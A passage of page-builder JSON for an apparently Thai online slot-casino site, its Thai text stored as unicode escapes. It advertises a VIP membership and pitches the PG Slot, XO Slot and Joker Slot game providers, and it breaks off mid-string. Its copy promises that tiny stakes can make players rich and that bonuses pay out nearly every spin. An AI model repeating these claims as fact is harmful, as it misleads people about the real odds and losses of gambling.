\\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e22\\u0e34\\u0e48\\u0e07\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e22\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e14\\u0e39\\u0e41\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e41\\u0e1a\\u0e1a VIP \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2b\\u0e27\\u0e35\\u0e48\\u0e22\\u0e07\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e19\\u0e2d\\u0e32\\u0e08\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01 \\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e01\\u0e47\\u0e08\\u0e30\\u0e2a\\u0e39\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e30\\u0e41\\u0e19\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e08\\u0e49\\u0e32\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e23\\u0e32\\u0e22\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e40\\u0e2d\\u0e47\\u0e01\\u0e0b\\u0e4c\\u0e04\\u0e25\\u0e39\\u0e0b\\u0e35\\u0e1f\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a Line Official \\u0e41\\u0e25\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19 \\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e17\\u0e34\\u0e49\\u0e07\\u0e44\\u0e27\\u0e49 \\u0e41\\u0e21\\u0e49\\u0e41\\u0e15\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e04\\u0e38\\u0e49\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e19\\u0e30\\u0e19\\u0e33\\u0e17\\u0e38\\u0e01\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e07\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e19\\u0e48\\u0e32\\u0e25\\u0e2d\\u0e07 \\u0e01\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e34\\u0e1a\\u0e1a\\u0e32\\u0e17\\u0e01\\u0e47\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\n\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e21\\u0e35\\u0e1e\\u0e31\\u0e19\\u0e18\\u0e21\\u0e34\\u0e15\\u0e23\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e48\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e19\\u0e33\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e07\\u0e34\\u0e19\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e35\\u0e48\\u0e19\\u0e48\\u0e32\\u0e25\\u0e38\\u0e49\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49 <\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #960c0a;\\\"><b>PG Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e43\\u0e04\\u0e23 \\u0e46 \\u0e01\\u0e47\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e01\\u0e43\\u0e2b\\u0e49 pg Slot \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e27\\u0e22 \\u0e40\\u0e1e\\u0e25\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e2d\\u0e1a\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08 \\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\\u0e25\\u0e36\\u0e01\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e27\\u0e32\\u0e07\\u0e01\\u0e25\\u0e22\\u0e38\\u0e17\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 pg Slot \\u0e04\\u0e37\\u0e2d \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c \\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e14\\u0e32\\u0e27\\u0e19\\u0e4c\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e17\\u0e38\\u0e01\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e40\\u0e0a\\u0e48\\u0e19 Mahjong Ways, Lucky Neko, \\u0e2b\\u0e23\\u0e37\\u0e2d Treasures of Aztec \\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e31\\u0e19\\u0e15\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2e\\u0e2d\\u0e15\\u0e17\\u0e38\\u0e01\\u0e07\\u0e27\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e17\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e40\\u0e01\\u0e21\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e21\\u0e34\\u0e19\\u0e34\\u0e21\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e46 \\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32 pg Slot \\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e15\\u0e34\\u0e14\\u0e43\\u0e08\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>XO Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e15\\u0e33\\u0e19\\u0e32\\u0e19\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e23\\u0e38\\u0e48\\u0e19\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e22\\u0e31\\u0e07\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e02\\u0e32\\u0e14\\u0e1b\\u0e32\\u0e01\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d XO Slot \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e07\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e32\\u0e19\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e14\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e16\\u0e49\\u0e27\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e02\\u0e2d\\u0e07 XO Slot \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e17\\u0e35\\u0e48\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e08\\u0e19\\u0e16\\u0e39\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32 \\u201c\\u0e04\\u0e48\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e0a\\u0e04\\u201d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 Roma, Supreme Caishen \\u0e2b\\u0e23\\u0e37\\u0e2d Lucky Panda \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e25\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e15\\u0e49\\u0e2d\\u0e07 XO Slot \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>Joker Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 